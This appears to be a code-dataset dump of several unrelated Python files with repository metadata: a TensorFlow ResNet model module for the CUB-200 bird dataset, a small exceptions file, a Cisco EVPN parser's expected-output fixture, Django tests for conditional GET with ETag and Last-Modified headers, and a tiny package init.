| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
4c705a57b2fcc686a66ac8e30bd435febf730fc5
| 14,084
|
py
|
Python
|
tensorflow2/tf2cv/models/resnet_cub.py
|
naviocean/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
[
"MIT"
] | 2,649
|
2018-08-03T14:18:00.000Z
|
2022-03-31T08:08:17.000Z
|
tensorflow2/tf2cv/models/resnet_cub.py
|
naviocean/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
[
"MIT"
] | 95
|
2018-08-13T01:46:03.000Z
|
2022-03-13T08:38:14.000Z
|
tensorflow2/tf2cv/models/resnet_cub.py
|
naviocean/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
[
"MIT"
] | 549
|
2018-08-06T08:09:22.000Z
|
2022-03-31T08:08:21.000Z
|
"""
ResNet for CUB-200-2011, implemented in TensorFlow.
Original paper: 'Deep Residual Learning for Image Recognition,' https://arxiv.org/abs/1512.03385.
"""
__all__ = ['resnet10_cub', 'resnet12_cub', 'resnet14_cub', 'resnetbc14b_cub', 'resnet16_cub', 'resnet18_cub',
'resnet26_cub', 'resnetbc26b_cub', 'resnet34_cub', 'resnetbc38b_cub', 'resnet50_cub', 'resnet50b_cub',
'resnet101_cub', 'resnet101b_cub', 'resnet152_cub', 'resnet152b_cub', 'resnet200_cub', 'resnet200b_cub']
from .common import is_channels_first
from .resnet import get_resnet
def resnet10_cub(classes=200, **kwargs):
"""
ResNet-10 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=10, model_name="resnet10_cub", **kwargs)
def resnet12_cub(classes=200, **kwargs):
"""
ResNet-12 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=12, model_name="resnet12_cub", **kwargs)
def resnet14_cub(classes=200, **kwargs):
"""
ResNet-14 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=14, model_name="resnet14_cub", **kwargs)
def resnetbc14b_cub(classes=200, **kwargs):
"""
ResNet-BC-14b model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model (bottleneck compressed).
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=14, bottleneck=True, conv1_stride=False, model_name="resnetbc14b_cub",
**kwargs)
def resnet16_cub(classes=200, **kwargs):
"""
ResNet-16 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=16, model_name="resnet16_cub", **kwargs)
def resnet18_cub(classes=200, **kwargs):
"""
ResNet-18 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=18, model_name="resnet18_cub", **kwargs)
def resnet26_cub(classes=200, **kwargs):
"""
ResNet-26 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=26, bottleneck=False, model_name="resnet26_cub", **kwargs)
def resnetbc26b_cub(classes=200, **kwargs):
"""
ResNet-BC-26b model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model (bottleneck compressed).
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=26, bottleneck=True, conv1_stride=False, model_name="resnetbc26b_cub",
**kwargs)
def resnet34_cub(classes=200, **kwargs):
"""
ResNet-34 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=34, model_name="resnet34_cub", **kwargs)
def resnetbc38b_cub(classes=200, **kwargs):
"""
ResNet-BC-38b model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model (bottleneck compressed).
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=38, bottleneck=True, conv1_stride=False, model_name="resnetbc38b_cub",
**kwargs)
def resnet50_cub(classes=200, **kwargs):
"""
ResNet-50 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=50, model_name="resnet50_cub", **kwargs)
def resnet50b_cub(classes=200, **kwargs):
"""
ResNet-50 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=50, conv1_stride=False, model_name="resnet50b_cub", **kwargs)
def resnet101_cub(classes=200, **kwargs):
"""
ResNet-101 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=101, model_name="resnet101_cub", **kwargs)
def resnet101b_cub(classes=200, **kwargs):
"""
ResNet-101 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=101, conv1_stride=False, model_name="resnet101b_cub", **kwargs)
def resnet152_cub(classes=200, **kwargs):
"""
ResNet-152 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=152, model_name="resnet152_cub", **kwargs)
def resnet152b_cub(classes=200, **kwargs):
"""
ResNet-152 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=152, conv1_stride=False, model_name="resnet152b_cub", **kwargs)
def resnet200_cub(classes=200, **kwargs):
"""
ResNet-200 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=200, model_name="resnet200_cub", **kwargs)
def resnet200b_cub(classes=200, **kwargs):
"""
ResNet-200 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=200, conv1_stride=False, model_name="resnet200b_cub", **kwargs)
def _test():
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
data_format = "channels_last"
# data_format = "channels_first"
pretrained = False
models = [
resnet10_cub,
resnet12_cub,
resnet14_cub,
resnetbc14b_cub,
resnet16_cub,
resnet18_cub,
resnet26_cub,
resnetbc26b_cub,
resnet34_cub,
resnetbc38b_cub,
resnet50_cub,
resnet50b_cub,
resnet101_cub,
resnet101b_cub,
resnet152_cub,
resnet152b_cub,
resnet200_cub,
resnet200b_cub,
]
for model in models:
net = model(pretrained=pretrained, data_format=data_format)
batch = 14
x = tf.random.normal((batch, 3, 224, 224) if is_channels_first(data_format) else (batch, 224, 224, 3))
y = net(x)
assert (tuple(y.shape.as_list()) == (batch, 200))
weight_count = sum([np.prod(K.get_value(w).shape) for w in net.trainable_weights])
print("m={}, {}".format(model.__name__, weight_count))
assert (model != resnet10_cub or weight_count == 5008392)
assert (model != resnet12_cub or weight_count == 5082376)
assert (model != resnet14_cub or weight_count == 5377800)
assert (model != resnetbc14b_cub or weight_count == 8425736)
assert (model != resnet16_cub or weight_count == 6558472)
assert (model != resnet18_cub or weight_count == 11279112)
assert (model != resnet26_cub or weight_count == 17549832)
assert (model != resnetbc26b_cub or weight_count == 14355976)
assert (model != resnet34_cub or weight_count == 21387272)
assert (model != resnetbc38b_cub or weight_count == 20286216)
assert (model != resnet50_cub or weight_count == 23917832)
assert (model != resnet50b_cub or weight_count == 23917832)
assert (model != resnet101_cub or weight_count == 42909960)
assert (model != resnet101b_cub or weight_count == 42909960)
assert (model != resnet152_cub or weight_count == 58553608)
assert (model != resnet152b_cub or weight_count == 58553608)
assert (model != resnet200_cub or weight_count == 63034632)
assert (model != resnet200b_cub or weight_count == 63034632)
if __name__ == "__main__":
_test()
| 36.487047
| 117
| 0.673246
| 1,716
| 14,084
| 5.417249
| 0.088578
| 0.04034
| 0.040878
| 0.047009
| 0.81207
| 0.777324
| 0.76861
| 0.710628
| 0.710628
| 0.710628
| 0
| 0.076685
| 0.219469
| 14,084
| 385
| 118
| 36.581818
| 0.768944
| 0.544093
| 0
| 0.030612
| 0
| 0
| 0.090942
| 0
| 0
| 0
| 0
| 0
| 0.193878
| 1
| 0.193878
| false
| 0
| 0.05102
| 0
| 0.428571
| 0.010204
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c74f805f9da7d3322c4f31a25b5cd3622a8e969
| 584
|
py
|
Python
|
kratos_salome_plugin/exceptions.py
|
armingeiser/KratosSalomePlugin
|
d402ca9edef8dff071ceabf0ebac0d858a6fbfcc
|
[
"BSD-3-Clause"
] | 6
|
2020-01-23T20:54:17.000Z
|
2021-02-19T09:52:29.000Z
|
kratos_salome_plugin/exceptions.py
|
armingeiser/KratosSalomePlugin
|
d402ca9edef8dff071ceabf0ebac0d858a6fbfcc
|
[
"BSD-3-Clause"
] | 20
|
2020-01-25T16:05:43.000Z
|
2020-12-18T20:36:46.000Z
|
kratos_salome_plugin/exceptions.py
|
armingeiser/KratosSalomePlugin
|
d402ca9edef8dff071ceabf0ebac0d858a6fbfcc
|
[
"BSD-3-Clause"
] | 3
|
2020-05-27T13:31:08.000Z
|
2020-12-18T19:50:43.000Z
|
# _ __ _ ___ _ ___ _ _
# | |/ /_ _ __ _| |_ ___ __/ __| __ _| |___ _ __ ___| _ \ |_ _ __ _(_)_ _
# | ' <| '_/ _` | _/ _ (_-<__ \/ _` | / _ \ ' \/ -_) _/ | || / _` | | ' \
# |_|\_\_| \__,_|\__\___/__/___/\__,_|_\___/_|_|_\___|_| |_|\_,_\__, |_|_||_|
# |___/
# License: BSD License ; see LICENSE
#
# Main authors: Philipp Bucher (https://github.com/philbucher)
#
"""
This file defines the custom exceptions used in the plugin
"""
class UserInputError(Exception): pass
| 36.5
| 77
| 0.438356
| 27
| 584
| 5.777778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.369863
| 584
| 15
| 78
| 38.933333
| 0.423913
| 0.886986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
4c78e8d1f095a63005595b6589bc4487044f7dcc
| 989
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowL2vpnEvpnMac/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowL2vpnEvpnMac/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowL2vpnEvpnMac/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
# Copyright (c) 2021 by Cisco Systems, Inc.
# All rights reserved.
expected_output = {
'evi': {
1: {
'bd_id': {
11: {
'eth_tag': {
0 : {
'mac_addr':{
'0050.56a9.f5af': {
'esi': '0000.0000.0000.0000.0000',
'next_hops': [
'11.11.11.2'
]
},
'b4a8.b902.32d6': {
'esi': '0000.0000.0000.0000.0000',
'next_hops': [
'Gi1/0/3:11'
]
}
}
}
}
}
}
}
}
}
| 31.903226
| 70
| 0.194135
| 52
| 989
| 3.576923
| 0.673077
| 0.344086
| 0.387097
| 0.344086
| 0.333333
| 0.333333
| 0.333333
| 0.333333
| 0
| 0
| 0
| 0.265734
| 0.710819
| 989
| 30
| 71
| 32.966667
| 0.384615
| 0.06269
| 0
| 0.142857
| 0
| 0
| 0.154762
| 0.051948
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c7a32cba279139a9f0a14c6c22b13474fecd425
| 12,885
|
py
|
Python
|
tests/conditional_processing/tests.py
|
ni-ning/django
|
2e7ba6057cfc82a15a22b6021cd60cf307152e2d
|
[
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 61,676
|
2015-01-01T00:05:13.000Z
|
2022-03-31T20:37:54.000Z
|
tests/conditional_processing/tests.py
|
ni-ning/django
|
2e7ba6057cfc82a15a22b6021cd60cf307152e2d
|
[
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 8,884
|
2015-01-01T00:12:05.000Z
|
2022-03-31T19:53:11.000Z
|
tests/conditional_processing/tests.py
|
mustafa0x/django
|
d7394cfa13a4d1a02356e3a83e10ec100fbb9948
|
[
"BSD-3-Clause",
"0BSD"
] | 33,143
|
2015-01-01T02:04:52.000Z
|
2022-03-31T19:42:46.000Z
|
from datetime import datetime
from django.test import SimpleTestCase, override_settings
FULL_RESPONSE = 'Test conditional get response'
LAST_MODIFIED = datetime(2007, 10, 21, 23, 21, 47)
LAST_MODIFIED_STR = 'Sun, 21 Oct 2007 23:21:47 GMT'
LAST_MODIFIED_NEWER_STR = 'Mon, 18 Oct 2010 16:56:23 GMT'
LAST_MODIFIED_INVALID_STR = 'Mon, 32 Oct 2010 16:56:23 GMT'
EXPIRED_LAST_MODIFIED_STR = 'Sat, 20 Oct 2007 23:21:47 GMT'
ETAG = '"b4246ffc4f62314ca13147c9d4f76974"'
WEAK_ETAG = 'W/"b4246ffc4f62314ca13147c9d4f76974"' # weak match to ETAG
EXPIRED_ETAG = '"7fae4cd4b0f81e7d2914700043aa8ed6"'
@override_settings(ROOT_URLCONF='conditional_processing.urls')
class ConditionalGet(SimpleTestCase):
def assertFullResponse(self, response, check_last_modified=True, check_etag=True):
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, FULL_RESPONSE.encode())
if response.request['REQUEST_METHOD'] in ('GET', 'HEAD'):
if check_last_modified:
self.assertEqual(response.headers['Last-Modified'], LAST_MODIFIED_STR)
if check_etag:
self.assertEqual(response.headers['ETag'], ETAG)
else:
self.assertNotIn('Last-Modified', response.headers)
self.assertNotIn('ETag', response.headers)
def assertNotModified(self, response):
self.assertEqual(response.status_code, 304)
self.assertEqual(response.content, b'')
def test_without_conditions(self):
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_if_modified_since(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_if_unmodified_since(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_if_none_match(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
# Several etags in If-None-Match is a bit exotic but why not?
self.client.defaults['HTTP_IF_NONE_MATCH'] = '%s, %s' % (ETAG, EXPIRED_ETAG)
response = self.client.get('/condition/')
self.assertNotModified(response)
def test_weak_if_none_match(self):
"""
If-None-Match comparisons use weak matching, so weak and strong ETags
with the same value result in a 304 response.
"""
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/weak_etag/')
self.assertNotModified(response)
response = self.client.put('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_NONE_MATCH'] = WEAK_ETAG
response = self.client.get('/condition/weak_etag/')
self.assertNotModified(response)
response = self.client.put('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
def test_all_if_none_match(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '*'
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/no_etag/')
self.assertFullResponse(response, check_last_modified=False, check_etag=False)
def test_if_match(self):
self.client.defaults['HTTP_IF_MATCH'] = ETAG
response = self.client.put('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MATCH'] = EXPIRED_ETAG
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
def test_weak_if_match(self):
"""
If-Match comparisons use strong matching, so any comparison involving
a weak ETag return a 412 response.
"""
self.client.defaults['HTTP_IF_MATCH'] = ETAG
response = self.client.get('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_MATCH'] = WEAK_ETAG
response = self.client.get('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_all_if_match(self):
self.client.defaults['HTTP_IF_MATCH'] = '*'
response = self.client.get('/condition/')
self.assertFullResponse(response)
response = self.client.get('/condition/no_etag/')
self.assertEqual(response.status_code, 412)
def test_both_headers(self):
# see https://tools.ietf.org/html/rfc7232#section-6
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_both_headers_2(self):
    """
    When If-Unmodified-Since and If-Match are both sent, If-Match takes
    precedence: a stale ETag yields 412 regardless of the date header.
    """
    cases = [
        # (If-Unmodified-Since, If-Match, expect full response)
        (LAST_MODIFIED_STR, ETAG, True),
        (EXPIRED_LAST_MODIFIED_STR, ETAG, True),
        (EXPIRED_LAST_MODIFIED_STR, EXPIRED_ETAG, False),
        (LAST_MODIFIED_STR, EXPIRED_ETAG, False),
    ]
    for if_unmodified_since, if_match, expect_full in cases:
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = if_unmodified_since
        self.client.defaults['HTTP_IF_MATCH'] = if_match
        response = self.client.get('/condition/')
        if expect_full:
            self.assertFullResponse(response)
        else:
            self.assertEqual(response.status_code, 412)
def test_single_condition_1(self):
    """A matching If-Modified-Since gives 304 only where the view sets Last-Modified."""
    self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
    self.assertNotModified(self.client.get('/condition/last_modified/'))
    self.assertFullResponse(
        self.client.get('/condition/etag/'), check_last_modified=False,
    )
def test_single_condition_2(self):
    """A matching If-None-Match gives 304 only where the view sets an ETag."""
    self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
    self.assertNotModified(self.client.get('/condition/etag/'))
    self.assertFullResponse(
        self.client.get('/condition/last_modified/'), check_etag=False,
    )
def test_single_condition_3(self):
    """An expired If-Modified-Since date doesn't suppress the response body."""
    self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
    self.assertFullResponse(
        self.client.get('/condition/last_modified/'), check_etag=False,
    )
def test_single_condition_4(self):
    """A stale If-None-Match value doesn't suppress the response body."""
    self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
    self.assertFullResponse(
        self.client.get('/condition/etag/'), check_last_modified=False,
    )
def test_single_condition_5(self):
    """Same as test_single_condition_1, against the alternate view variants."""
    self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
    self.assertNotModified(self.client.get('/condition/last_modified2/'))
    self.assertFullResponse(
        self.client.get('/condition/etag2/'), check_last_modified=False,
    )
def test_single_condition_6(self):
    """Same as test_single_condition_2, against the alternate view variants."""
    self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
    self.assertNotModified(self.client.get('/condition/etag2/'))
    self.assertFullResponse(
        self.client.get('/condition/last_modified2/'), check_etag=False,
    )
def test_single_condition_7(self):
    """An expired If-Unmodified-Since date yields 412 from either view."""
    self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
    for url in ('/condition/last_modified/', '/condition/etag/'):
        self.assertEqual(self.client.get(url).status_code, 412)
def test_single_condition_8(self):
    """A current If-Unmodified-Since date lets the full response through."""
    self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
    self.assertFullResponse(
        self.client.get('/condition/last_modified/'), check_etag=False,
    )
def test_single_condition_9(self):
    """Same as test_single_condition_7, against the alternate view variants."""
    self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
    for url in ('/condition/last_modified2/', '/condition/etag2/'):
        self.assertEqual(self.client.get(url).status_code, 412)
def test_single_condition_head(self):
    """Conditional processing also applies to HEAD requests."""
    self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
    self.assertNotModified(self.client.head('/condition/'))
def test_unquoted(self):
    """
    The same quoted ETag should be set on the header regardless of whether
    etag_func() in condition() returns a quoted or an unquoted ETag.
    """
    quoted = self.client.get('/condition/etag/')
    unquoted = self.client.get('/condition/unquoted_etag/')
    self.assertEqual(quoted['ETag'], unquoted['ETag'])
# Even when the ETag header is rendered correctly (covered by
# test_unquoted()), the matching algorithm might still compare against the
# wrong internal value, so verify that an unquoted ETag is actually matched.
def test_unquoted_if_none_match(self):
    self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
    self.assertNotModified(self.client.get('/condition/unquoted_etag/'))
    # A PUT with a matching If-None-Match must be rejected with 412.
    self.assertEqual(
        self.client.put('/condition/unquoted_etag/').status_code, 412,
    )
    self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
    self.assertFullResponse(
        self.client.get('/condition/unquoted_etag/'), check_last_modified=False,
    )
def test_invalid_etag(self):
    """A syntactically invalid If-None-Match value never matches."""
    self.client.defaults['HTTP_IF_NONE_MATCH'] = '"""'
    self.assertFullResponse(
        self.client.get('/condition/etag/'), check_last_modified=False,
    )
| 46.516245
| 86
| 0.697711
| 1,515
| 12,885
| 5.692409
| 0.10231
| 0.126391
| 0.152365
| 0.127551
| 0.814819
| 0.797658
| 0.780148
| 0.767857
| 0.737941
| 0.699212
| 0
| 0.020291
| 0.189135
| 12,885
| 276
| 87
| 46.684783
| 0.80513
| 0.052852
| 0
| 0.695455
| 0
| 0
| 0.185806
| 0.089888
| 0
| 0
| 0
| 0
| 0.318182
| 1
| 0.118182
| false
| 0
| 0.009091
| 0
| 0.131818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91478cc403b124238969e88d6c6e4de34c755925
| 104
|
py
|
Python
|
test_modules/regular_module/__init__.py
|
ryanking13/pyodide-importer
|
fb9f83e54eb307fcdb2590588f0b75db1c87ca97
|
[
"MIT"
] | 1
|
2021-11-16T11:55:54.000Z
|
2021-11-16T11:55:54.000Z
|
test_modules/regular_module/__init__.py
|
ryanking13/pyodide-importer
|
fb9f83e54eb307fcdb2590588f0b75db1c87ca97
|
[
"MIT"
] | null | null | null |
test_modules/regular_module/__init__.py
|
ryanking13/pyodide-importer
|
fb9f83e54eb307fcdb2590588f0b75db1c87ca97
|
[
"MIT"
] | null | null | null |
from .submodule2 import hello as submodule2_hello
def hello():
    """Return a fixed greeting identifying this module."""
    greeting = "hello from regular_module"
    return greeting
| 17.333333
| 49
| 0.769231
